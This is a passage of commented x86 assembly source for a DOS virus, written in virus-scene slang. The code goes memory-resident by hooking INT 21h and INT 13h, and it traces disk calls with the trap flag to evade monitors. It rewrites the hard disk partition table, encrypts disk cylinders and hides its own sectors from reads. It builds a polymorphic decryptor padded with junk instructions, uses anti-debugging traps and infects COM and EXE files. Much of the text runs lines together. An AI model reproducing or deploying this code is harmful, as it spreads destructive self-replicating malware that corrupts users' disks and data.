loc_084F :and byte ptr [ bp+7], 0FEh
loc_0853 :pop bpiret
; Diz installz viruz 2 memloc_0855 :
pop bx ; pop indexpop ax ; pop es_segpush axdec ax ; go2 mcb_blockmov ds , ax ; store it 2 dscmp byte ptr ds :[ 0], 5Ah ; last one ?jne short loc_08CEadd ax , ds :[ 3] ; add blockz_sizesub ax , 0FFh ; sub 4 viruz_bodymov dx , cs ; (4 our bufferz etc.)mov si , bx ; index 2 somov cl , 4shr si , cl ; make paragraphzadd dx , si ; add it 2 csdb 2eh , 8bh , 0b7h , 1ah , 00h ; mov si, cs:[1ah][bx]
; gimme min_mem (from exe_header)cmp si , 106hjae short loc_0881mov si , 106h
loc_0881 :add dx , si ; add min_memcmp ax , dx ; less ?jb short loc_08CEmov byte ptr ds :[ 0], 4Dh ; make middle_blocksub word ptr ds :[ 3], 100h ; sub 100h paragraphz
; (0ffh viruz and 01h _mcb_)mov ds :[ 12h ], ax ; set new mem_top 2 PSPmov es , ax ; gimme where_2_move_segpush cspop dsinc axmov ds :[ 1], ax ; store ownermov byte ptr [ which_jump_? - p][ bx ], 0EBhmov si , bx ; gimme indexxor di , di ; move 2 0000hmov cx , offset buffer - p ; gimme viruz_sizerep movsb ; and finally movepush espop dscall sub_078B ; move presun_rutinyxor ax , axmov ds , axclimov ax , ds :[ 21h * 4] ; gimme old_int_21hmov es :[ old_int_21h - p__ ], ax ; store itmov ax , word ptr ds :[ 21h * 4 + 2]mov es :[ old_int_21h - p__ + 2], axmov word ptr ds :[ 21h * 4], offset new_int_21h - pmov word ptr ds :[ 21h * 4 + 2], es ; and set my ownsti ; int_21h
loc_08CE :jmp loc_0A1E ; and go on
; Diz iz the beginning ...loc_08D1 :
call sub_08D4
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜsub_08D4 proc near
pop sisub si , offset sub_08d4 - p ; count where we aremov [ new_int_01h_mov_bx_? - p][ si ], sipush espush si ; si = 582hcldinc word ptr [ run_counter - p][ si ]mov byte ptr [ which_jump_? - p][ si ], 74hxor ax , axmov es , axmov ax , es :[ 46Ch] ; gimme tick_countermov [ mov_bx_? - p][ si ], ax ; store itmov [ crypt_value - p][ si ], ax ; 2 timezmov ax , 4B53h ; am i in mem ?int 21hcmp ax , 454Bh ; check markje short loc_0965mov ah, 52h ; nope so go onint 21h ; gimme list_of_listz_ptrmov ax , es :[ bx - 2] ; gimme 1. MCB_segmentmov [ which_segment_? - p][ si ], ax ; store itmov byte ptr [ jump_patch_? - p][ si ], 0mov ax , 3501h ; get int_01hint 21hpush bx ; store it to stackpush esmov ax , 3513h ; get int_13hint 21hmov [ int_13h_addr - p][ si ], bx ; store it tomov [ int_13h_addr - p + 2][ si ], es ; variablezmov ax , 2501h ; set my int_01hlea dx , [ new_int_01h - p][ si ]int 21hlea bx , [ buffer - p][ si ]mov cx , 1 ; read partition_tablemov dx , 80hpush cspop espushfpop axor ah, 1 ; set trap_flagpush axpopfmov ax , 201h ; and trace int_13hcall int_13hpushfpop axand ah, 0FEh ; null trap_flagpush axpopfpop dspop dxpushfmov ax , 2501h ; restore int_01hint 21hpopfjc short loc_09C0 ; any errorz ?push cspop ds
cmp word ptr [ bx +25h ], offset the_second_part - pjne short loc_0968 ; iz in partition my viruz ?
; (mark)loc_0965 :
jmp loc_0A1Dloc_0968 :
cmp word ptr [ bx + 180h ], 72Eh; next markje short loc_09C0mov ah, 8 ; gimme hard_paramzmov dl , 80h ; prvniho_hadrucall int_13hjc short loc_09C0 ; error ?and cx , 3Fh ; voklesti max_sectormov [ max_sektor - p][ si ], clmov [ max_sektor_2 - p][ si ], cland dh, 3Fh ; voklesti headzmov [ max_heads - p][ si ], dhmov ax , 301hsub cl , 7mov [ partition_sec_n - p][ si ], clmov dx , 80hcall int_13h ; write partition_tablejc short loc_09C0 ; error ?push cxpush dxpush sixchg di , simov cx , 4 ; 4 entryzadd bx , 1EEh ; go2 last_parition_entry
locloop_09A9 :mov al , [ bx +4] ; read FAT typecmp al , 1 ; DOS 12bit ?je short loc_09C3cmp al , 4 ; 4 = DOS 16bit ?jb short loc_09B8 ; 5 = EXTENDED_DOS_PARTITION ?cmp al , 6 ; 6 = BIGDOS (nad 32Mbyte) ?jbe short loc_09C3
loc_09B8 :sub bx , 10h ; every record has 10h bytezloop locloop_09A9
pop sipop dxpop cx
loc_09C0 :jmp loc_0855 ; jmp 2 mem_install
loc_09C3 :mov cx , [ bx +2] ; gimme boot_startmov dh, [ bx +1] ; gimme headcall sub_0D2F ; convert_itadd si , 7 ; make valid cyl_numbermov [ lowest_cyl - p][ di ], si ; store itxchg si , axmov cx , [ bx +6] ; gimme end cylindermov dh, [ bx +1] ; gimme headcall sub_0D2F ; convert_itmov [ max_cyl_number - p][ di ], si ; store itmov [ mov_ax_? - p][ di ], si ; store itadd ax , sishr ax , 1 ; div with 2mov [ one_half_cyl - p][ di ], ax ; store one_halfpop sipop dx
pop cxmov ax , 307hxchg bx , siinc cxmov [ viruz_start_sec - p][ bx ], cxcall int_13h ; write viruz_ bodyjc loc_09C0 ; (whole)lea si , [ boot_start - p][ bx ] ; and now move bootlea di , [ buffer - p][ bx ]push dimov cx , offset the_second_part - offset boot_startrep movsbdb 0b8h ; mov ax, ?
mov_ax_? dw 265h ; store starting_sector_stosw ; _2_ cryptmov ax , 301h ; write the new parition_tablepop bxmov cx , 1call int_13hjc loc_09C0 ; error ?
loc_0A1D :pop bx ; nope
loc_0A1E :push cs ; dis is a renewal of partspop ds ; that were overwritten push cs ; by decode routinepop esdb 8Dh, 0B7h ; lea si, cs:[overwritt...][bx]dw offset overwritten_bytez - pdb 81h , 0C3h ;add bx, offset decode_...dw offset decode_routine_table - pmov cx , 0Ah ; there'z 0ah_partz
locloop_0A2D :mov di , [ bx ] ; gimme where_2_move_offsetpush cxmov cx , 0Ah ; every_part haz 0ah bytezrep movsbpop cxinc bx ; go2 next_move_offsetinc bxloop locloop_0A2D ; and go on
pop esdb 83h , 0C3h ; add bx, 0 - (....)db 0 - ( offset beginning_ofs - offset exe_header )mov di , es ; bx 2 exe_header_offsetadd di , 10h ; count start_segadd [ bx +16h ], di ; store relo_csadd [ bx +0Eh], di ; store relo_sscmp word ptr [ bx +6], 0 ; what'bout relo_cnt ?je short loc_0AB6 ; there'z any ?mov ds , es :[ 2ch ] ; yope; gimme environment_segxor si , si ; start at offset 00h
loc_0A56 :inc sicmp word ptr [ si ], 0 ; eof formal_environment ?jne loc_0A56add si , 4 ; go2 prog_namexchg dx , simov ax , 3D00h ; open prog_fileint 21hjc short loc_0ADB ; error ?
push cspop dsmov ds :[ handle_ - p - 10h ][ bx ], ax ; store handle_mov dx , [ bx +18h ] ; gimme tabl_offsetmov ax , 4200h ; f_ptr 2 itcall sub_0817push es ; store start_segxchg di , ax
loc_0A79 :push axlea dx , cs :[ reloc_buffer - p - 10h ][ bx ]mov cx , [ bx +6] ; gimme relo_cntcmp cx , ( name_buffer + 34 - random_number ) shr 2jb short loc_0A8A ; 2 big ?mov cx , ( name_buffer + 34 - random_number ) shr 2
; yope gimme max_relo_cnt_nowloc_0A8A :
sub [ bx +6], cx ; sub it from relo_cntpush cxshl cx , 1 ; mul it with 4shl cx , 1 ; (segment:offset)mov ah, 3Fh ; read reloc_tablecall sub_0817jc short loc_0ADB ; error ?pop cxpop axxchg si , dx
locloop_0A9D :add [ si +2], ax ; make relo_segles di , dword ptr [ si ] ; gimme relo_addradd es :[ di ], ax ; and add start_segadd si , 4 ; go2 next entryloop locloop_0A9D
cmp word ptr [ bx +6], 0 ; relo_cnt is null ?ja loc_0A79 ; if yope go onpop es ; nopemov ah, 3Eh ; so close_filecall sub_0817
loc_0AB6 : ; nopepush espop dscmp byte ptr cs :[ bx +12h ], 0 ; com_file ?jne short loc_0ACCmov si , bx ; gimme exe_header_offsetmov di , 100hmov cx , 3 ; move 3 bytez 2 100hrep movsbpop axjmp short loc_0AD7 ; and go on
loc_0ACC : ; nope it'z exe_filepop axclimov sp , cs :[ bx +10h ] ; gimme spmov ss , cs :[ bx +0Eh] ; gimme sssti
loc_0AD7 :jmp dword ptr cs :[ bx +14h ] ; finally jmp 2 real_prog_start
loc_0ADB :mov ah, 4Ch ; there waz an error !int 21h
;reloc_buffer label near
;
; in : dx = max_number; out : dx = random_numberrandom_number :
mov cs :[ mov_si_? - p], sipush axpush bxpush cxpush dxdb 0b9h ; mov cx, ?
mov_cx_? dw 0b0d4hdb 0bbh ; mov bx, ?
mov_bx_? dw 6210hmov dx , 15Ahmov ax , 4E35hxchg si , axxchg dx , axtest ax , axjz short loc_0AFCmul bx
loc_0AFC :jcxz short loc_0B03xchg cx , axmul siadd ax , cx
loc_0B03 :xchg si , axmul bxadd dx , siinc axadc dx , 0mov cs :[ mov_bx_? - p], axmov cs :[ mov_cx_? - p], dxmov ax , dxpop cxxor dx , dxjcxz short loc_0B1Ediv cx
loc_0B1E :pop cxpop bxpop axpop sipush sicmp byte ptr cs :[ si ], 0CCh ; there'z a breakpoint ?
loc_0B27 :je loc_0B27 ; if yope stay in loop
; (nice_try ...)db 0beh ; mov si, ?
mov_si_? dw 5cbhretn
sub_08D4 endp
; decode_routine haz 10 piecez ... (10 instructionz );
instr_start :db 01h ; instruction_lengthdb 50h ; push ?_reg;
db 01h ; instruction_lengthpush_what db 0eh ; push cs or push ss
;db 01h ; instruction_lengthdb 1fh ; pop ds;db 03h ; instruction_length
mov_index_? db 0bfh ; mov ?_index_reg, im16viruz_start dw 0582h ; im16
;db 03h ; instruction_length
mov_?_instr db 0b8h ; mov ?_reg, im16crypt_viruz_value dw 0bfbah ; im16
;db 02h ; instruction_lengthdb 31h ; xor [index_reg], ?_reg
xor_?_instr db 05h ; ModR/M;db 04h ; instruction_lengthdb 81h ; add ?_reg, im16
add_?_instr db 0c0h ; ModR/M, opcodenext_crypt_value_ dw 6efeh ; im16
;db 01h ; instruction_length
inc_?_instr db 47h ; inc ?_reg;db 04h ; instruction_lengthdb 81h ; cmp ?_index_reg, im16
cmp_index_? db 0ffh ; ModR/M, opcodeviruz_end dw 135ah ; im16
;db 02h ; instruction_lengthdb 75h ; jnz disp8db 0efh;
;unimportant_instr :
;nopstcclcstidb 2Eh ; cs:db 36h ; ss:db 3Eh ; ds:cldstdcmc;
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz movez unimportant_instr 2 buffer; in : dx = wieviel :-)sub_0B57 proc near
or dx , dx ; count is null ?jz short loc_ret_0B71push sipush cx ; push regzpush dxmov cx , dx ; count 2 cx
locloop_0B60 :mov si , offset unimportant_instr - pmov dx , 0Ah ; max_random 2 0ah (10 instr)call random_number ; gimme random_numberadd si , dx ; go2 instructionmovsb ; move itloop locloop_0B60 ; and go on
pop dxpop cx ; restore regzpop si
loc_ret_0B71 :retn ; and end ...
sub_0B57 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz putz be4 and after instruction unimportant_in structionz; in : dx = wieviel u_instrsub_0B72 proc near
mov ax , dx ; instr_count 2 axinc dxcall random_number ; gimme random_numbersub ax , dx ; sub cur_instr_count from
; instr_countcall sub_0B57 ; move unimportant_instrxchg dx , axrep movsb ; move real_instructiondb 81h , 0FBh ; cmp bx, offset jnz_offset - pdw offset jnz_offset - p ; it'z last_one ? (jnz xor_...)jnz short loc_0B92mov ax , ds :[ xor_offset - p] ; gimme xor_offsetsub ax , di ; sub cur_instr_buffer_indexadd ax , offset instr_buffer - p; add instr_buffer_backsub ax , [ bx ] ; sub jnz_offsetdec di ; go2 disp8stosb ; and store it
loc_0B92 :call sub_0B57 ; and now put some u_instr
; after real_instructionretn ; and end ...
sub_0B72 endp
m_?_i dw offset mov_?_instr - p ; 0b38h ; 0b96h ; 0614hx_?_i dw offset xor_?_instr - p ; 0b3dh ; 0b98h ; 0616ha_?_i dw offset add_?_instr - p ; 0b40h ; 0b9ah ; 0618hm_i_? dw offset mov_index_? - p ; 0b34h ; 0b9ch ; 061ahx_?_i_ dw offset xor_?_instr - p ; 0b3dh ; 0b9eh ; 061chi_?_i dw offset inc_?_instr - p ; 0b44h ; 0ba0h ; 061ehc_i_? dw offset cmp_index_? - p ; 0b47h ; 0ba2h ; 0620h
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; This sets rite ModR/M instructions ....; There are two phases here:; 1. : m_?_i - a_?_i = sets instruction that worx w ith xor_reg; 2. : m_i_? - c_i_? = sets instruction that worx w ith index_reg; in : dl = random_number that depends on phase
; Just go through it and try to know what's happeni ng here :)sub_0BA4 proc nearloc_0BA4 :
lodswxchg di , axmov al , dlcmp si , offset i_?_i - pjne short loc_0BB6and al , 5cmp al , 1jne short loc_0BC6mov al , 7
loc_0BB6 :cmp si , offset a_?_i - pjne short loc_0BC6mov cl , 3shl al , clor [ di ], alor al , 0C7hjmp short loc_0BCA
loc_0BC6 :or [ di ], alor al , 0F8h
loc_0BCA :and [ di ], alcmp si , offset m_i_? - pje short loc_ret_0BDAcmp si , offset sub_0BA4 - pje short loc_ret_0BDAjmp short loc_0BA4
loc_ret_0BDA :retn
sub_0BA4 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz preparez decode_routine ...sub_0BDB proc near
mov dx , 2call random_number ; gimme random_numbermov byte ptr ds :[ push_what - p], 0Eh; store push_csor dx , dx ; random_number nullovy ?jz short loc_0BEFmov byte ptr ds :[ push_what - p], 16h ; nope so store
; push_ssloc_0BEF :
mov si , offset m_?_i - p ; start with first_phazeloc_0BF2 :
mov dx , 8call random_number ; gimme random_numbercmp dl , 4 ; we don't need sp_regje loc_0BF2mov bl , dl ; reg 2 blcall sub_0BA4 ; set instructionz etc.mov si , offset m_i_? - p ; start with second_phaze
loc_0C05 :mov dx , 3call random_number ; gimme random_numberadd dl , 6cmp dl , 8
jne short loc_0C15mov dl , 3 ; yope set bx_reg
loc_0C15 :cmp dl , bl ; xor_reg = index_reg ?je loc_0C05call sub_0BA4 ; nope so set instr. etc.xor cx , cxmov di , offset decode_routine_table - p
loc_0C21 :cmp cx , 9 ; jnz_instruction ?jne short loc_0C40
loc_0C26 : ; yope; it'z jnz disp8; so it must be in the range; 0 - 80h bytez
mov dx , 0C8hcall random_number ; gimme random_numbersub dx , 64h ; sub 0c8h / 2add dx , ds :[ xor_offset - p] ; add xor_offsetcmp dx , 0 ; less than 0 ?jl loc_0C26cmp dx , ds :[ max_number - p] ; more or same than max_number?jge loc_0C26jmp short loc_0C46
loc_0C40 :db 0bah ; mov dx, ?
max_number dw 466h ; random_max iz max_numbercall random_number ; gimme random_number
loc_0C46 :jcxz short loc_0C5F ; first timez here ?mov si , offset decode_routine_table - ppush cx ; nope
locloop_0C4C : ; so go2 cur_instr and check; 4 distancez
lodswsub ax , dx ; check 4 distancecmp ax , 0Ah ; more or same than 0ah bytez ?jge loc_0C5Ccmp ax , 0FFF6h ; less or same than 0ah bytez ?jle loc_0C5Cpop cx ; nope ! get another random_#jmp loc_0C21
loc_0C5C : ; yopeloop locloop_0C4C ; so go2 next insrtpop cx ; last_one
loc_0C5F :xchg dx , ax ; random_number 2 axstosw ; store it 2 decode_...inc cx ; inc countercmp cx , 0Ah ; less than 0ah (10 piecez) ?jb loc_0C21
; nope = decode_routine_table; initialized ...
mov bx , offset decode_routine_table - pmov si , offset instr_start - p
loc_0C6D :mov di , offset instr_buffer - plodsb ; read instr_lengthmov cl , al ; instr_length 2 cxmov dx , 8 ; u_instr 2 dxsub dx , cx ; sub itmov ax , [ bx +2] ; gimme next_d_entry_offset
; if jnz_instr next iz
; viruz_beginning ...sub ax , [ bx ] ; sub from it cur_d_entrycmp ax , 0Ah ; distance 0ah ?jne short loc_0C8Binc dx ; inc u_instr (we don't needinc dx ; jmp_instr ...)call sub_0B72inc bx ; go2 next decode_routine_inc bx ; _offsetjmp short loc_0CB5 ; and go on
loc_0C8B : ; nopecall random_number ; gimme random_numbercall sub_0B72 ; copy instruction 2 buffer ...mov dx , di ; gimme instr_buffer_offsetsub dx , offset three_bytez - p; sub ofs instr_buffer - 3add dx , [ bx ] ; add cur_d_entrymov al , 0E9h ; far_jmp 2 alstosb ; store itinc bx ; go2 next_entryinc bxmov ax , [ bx ] ; gimme itsub ax , dx ; sub itcmp ax , 7Eh ; distance more than 7eh ?jg short loc_0CB4cmp ax , 0FF7Fh ; distance less than 0ff7fh ?jl short loc_0CB4inc ax ; nope inc distance (jmp_short
; only 2 bytez ...)mov byte ptr [ di - 1], 0EBh ; store rather jmp_shortstosb ; store disp8jmp short loc_0CB5 ; and go on
loc_0CB4 : ; yopestosw ; store disp16
loc_0CB5 :push bxpush cxdb 0b9h ; mov cx, 0
mov_cx_?_ dw 0 ; gimme file_pointerdb 0bah ; mov dx, 13h
mov_dx_?_ dw 13hadd dx , [ bx - 2] ; add decode_table_entryadc cx , 0 ; (the current)push cxpush dxcall sub_0E63 ; go2 f_ptrmov cx , 0Ah ; read 0ah bytezdb 0bah ; mov dx, ?
buffer_offset dw 0a4h ; 2 [buffer_offset]add ds :[ buffer_offset - p], cx ; go2 next_buffer_offset_entrycall f_read_pop dxpop cxjc short loc_0CE6 ; error ?call sub_0E63 ; go back 2 f_ptrxchg cx , di ; cur_instr_buffer_offset 2 cxmov dx , offset instr_buffer - p; sub offset instr_buffersub cx , dx ; sub it 2 get instr_sizecall f_write_ ; and write it ...
loc_0CE6 :pop cxpop bxjc short loc_ret_0CF3 ; error ?db 81h , 0FBh ; cmp bx, offset beginning_ofs - p
dw offset beginning_ofs - pjnc short loc_ret_0CF3 ; last decode_routine_entry ?jmp loc_0C6D ; nope so go on ...
loc_ret_0CF3 : ; yoperetn ; so end ...
sub_0BDB endp
; Purpose of moving to buffer:; while writing viruz_body to file, the virus crypt s viruz_body so; int_13h and crypt_routine and routine that writes it to file; far far away from range of crypt_routinepresun_rutiny :
mov cx , offset buffer - p ; gimme size 2 writexor dx , dx ; start with offset nullcall sub_0D12 ; crypt_ itmov ah, 40h ; write crypted_ viruz_bodymov bx , ds :[ handle - p] ; 2 file; gimme handlepushf ; anddb 9Ah ; call far ptr old_int_21h
old_int_21h dw 0, 0jc short loc_0D0C ; error ?cmp ax , cx ; written_&_wanted the same ?
loc_0D0C :pushf ; push flagzcall sub_0D12 ; decrypt_ viruz_bodypopf ; restore flagzretn ; and end ...
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz cryptz_ viruz_bodysub_0D12 proc near
push cxmov si , dx ; gimme viruz_start_offsetdb 0b8h ; mov ax, 0
crypt_viruz dw 0 ; gimme init_crypt_valemov cx , offset buffer - p ; gimme viruz_size
locloop_0D1B :xor [ si ], ax ; crypt_itdb 05h ; add ax, ?
next_crypt_value dw 0 ; go2 next_crypt_valueinc si ; go2 next viruz_byteloop locloop_0D1B ; and go on
pop cxretn ; and end ...
sub_0D12 endp
new_int_24h :mov al , 3iret
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz callz old_int_13hsub_0D28 proc near
pushfcall dword ptr cs :[ old_int_13h - p__ ]retn
sub_0D28 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz getz cylinder_number in sisub_0D2F proc near
push cxpush dxshr cl , 1shr cl , 1and dh, 0C0hor dh, clmov cl , 4shr dh, clmov dl , chxchg si , dxpop dxpop cxretn
sub_0D2F endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz cryptz_ a buffercrypt_ proc near
push axpush bx ; push regzpush cxdb 0b0h ; mov al, ?
secz_count db 0 ; gimme secz_countdb 0bbh ; mov bx, ?
buf_ptr dw 0 ; gimme buf_ptrloc_0D4D :
mov cx , 100h ; do it 256*; (in wordz)
locloop_0D50 :db 26h , 81h , 37h ; xor word ptr es:[bx], ?
crypt_value dw 2b50h ; xor word ...inc bx ; go2 next_word in bufferinc bxloop locloop_0D50 ; and go on
dec al ; dec secz_countjnz loc_0D4D ; last one ?pop cx ; yopepop bx ; restore regzpop axretn ; and end ...
crypt_ endp
new_int_13h :cmp ah, 2 ; read sector(z) ?je short loc_0D6Ecmp ah, 3 ; write sector(z) ?je short loc_0D6Ejmp loc_0E50 ; nope so end
loc_0D6E :cmp dx , 80h ; 0.head, first_harddisk ?
jne short loc_0DE0test cx , 0FFC0h ; cylinder is null ?jnz short loc_0DE0push bx ; ok it could be work withpush dx ; partition_table or withpush si ; viruz_bodypush dipush cxpush cxmov si , ax ; gimme ax_regand si , 0FFh ; gimme secz_2_workmov di , simov al , 1push axjz short loc_0DBB ; secz_2_work is null ?jcxz short loc_0DDB ; sec_number is null ?cmp cl , 1 ; work with parition_table ?je short loc_0DCD
loc_0D94 : ; nope so it could be viruzdb 80h , 0f9h ; body
max_sektor db 11h ; cmp cl, ?ja short loc_0DDB ; are we in the rangedb 80h , 0f9h ; cmp cl, ?
partition_sec_n db 0ah ; where'z viruz_body ?jb short loc_0DD2cmp ah, 3 ; yope = writing ?je short loc_0DDB ; (end_with error)push bxmov cx , 200h ; do it 512*
locloop_0DA7 :mov byte ptr es :[ bx ], 0 ; store nullinc bx ; inc buffer_ptrloop locloop_0DA7 ; and go on ...
pop bxloc_0DAF :
add bx , 200h ; go2 next_sec_in_bufferpop axpop cxinc cx ; inc sec_numberpush cxpush axdec si ; dec secz_2_workjnz loc_0D94 ; null ?
loc_0DBB :clc
loc_0DBC : ; yopepop ax ; restore ax_regpushfxchg di , ax ; secz_2_work 2 axsub ax , si ; sub secz_that_weren't_readpopfmov ah, ch ; error number 2 ahpop cxpop cxpop di ; restore regzpop sipop dxpop bxretf 2 ; and end ...
loc_0DCD :mov cl , byte ptr cs :[ partition_sec_n - p__ ] ; yope
; so gimme parition_table_secloc_0DD2 :
call sub_0D28 ; write or read itmov ch , ah ; gimme possible_error_numberjc loc_0DBC ; error ?jmp short loc_0DAF ; nope = go on
loc_0DDB : ; yopestc ; so set up error_flagmov ch , 0BBh ; and error_number 2 chjmp short loc_0DBC ; (undefined_error)
loc_0DE0 : ; nopecmp dl , 80h ; it'z first_harddisk ?jne short loc_0E50push axpush cxpush dxpush si ; push regzpush dspush cspop dsmov byte ptr ds :[ secz_count - p__ ], 0 ; store nullmov word ptr ds :[ buf_ptr - p__ ], bx ; store bxcall sub_0D2F ; gimme cylinder_numberand cl , 3Fh ; voklesti sectorand dh, 3Fh ; voklesti head
loc_0DFE :or al , al ; secz_2_work is null ?jz short loc_0E31db 81h , 0feh ; cmp si, ?
max_cyl_number dw 265h ; are we in the rangejae short loc_0E31 ; where'z harddiskdb 81h , 0feh ; cmp si, ?
cur_cyl_number dw 1234h ; crypted_ ?jb short loc_0E14inc byte ptr ds :[ secz_count - p__ ] ; yope inc secz_countjmp short loc_0E1A
loc_0E14 :add word ptr ds :[ buf_ptr - p__ ], 200h ; go2 next_sec_in_buf
loc_0E1A :dec al ; dec secz_2_workinc cldb 80h , 0f9h ; cmp cl, ?
max_sektor_2 db 11h ; sector in range ?jbe loc_0DFEmov cl , 1 ; nope so sector 2 1inc dh ; and inc headdb 80h , 0feh ; cmp dh, ?
max_heads db 07h ; head in range ?jbe loc_0DFExor dh, dh ; nope so head 2 nullinc si ; and inc cylinderjmp short loc_0DFE ; and go on
loc_0E31 : ; yopecmp byte ptr ds :[ secz_count - p__ ], 0; must we (un)crypt_pop ds ; something ?pop si ; restore regzpop dxpop cxpop axjz short loc_0E50cmp ah, 2 ; yope; read ?je short loc_0E45call crypt_ ; nope write; crypt_ it
loc_0E45 :call sub_0D28 ; do itpushfcall crypt_ ; and uncrypt_ itpopfretf 2
loc_0E50 : ; end ...db 0EAh ; jmp far ptr old_int_13h
old_int_13h label near
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz writez 2 file ...f_write_ proc near
mov ah, 40hjmp $ + 4
f_write_ endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz readz from file ...f_read_ proc near
mov ah, 3Fh ; '?'call sub_0E6Fjc short loc_ret_0E5Ecmp ax , cx
loc_ret_0E5E :retn
f_read_ endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß; SUBROUTINE;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ; Diz call f_ptr fcsub_0E5F proc near
xor cx , cxmov dx , cx
sub_0E63 :mov ax , 4200hjmp short loc_0E6F
sub_0E68 :xor cx , cxmov dx , cx
sub_0E6C:mov ax , 4202h
sub_0E6F :loc_0E6F :
mov bx , word ptr cs :[ handle - p]
; Diz call old_int_21hint_21h :
pushfclicall dword ptr cs :[ old_int_21h - p__ ]retn
sub_0E5F endp
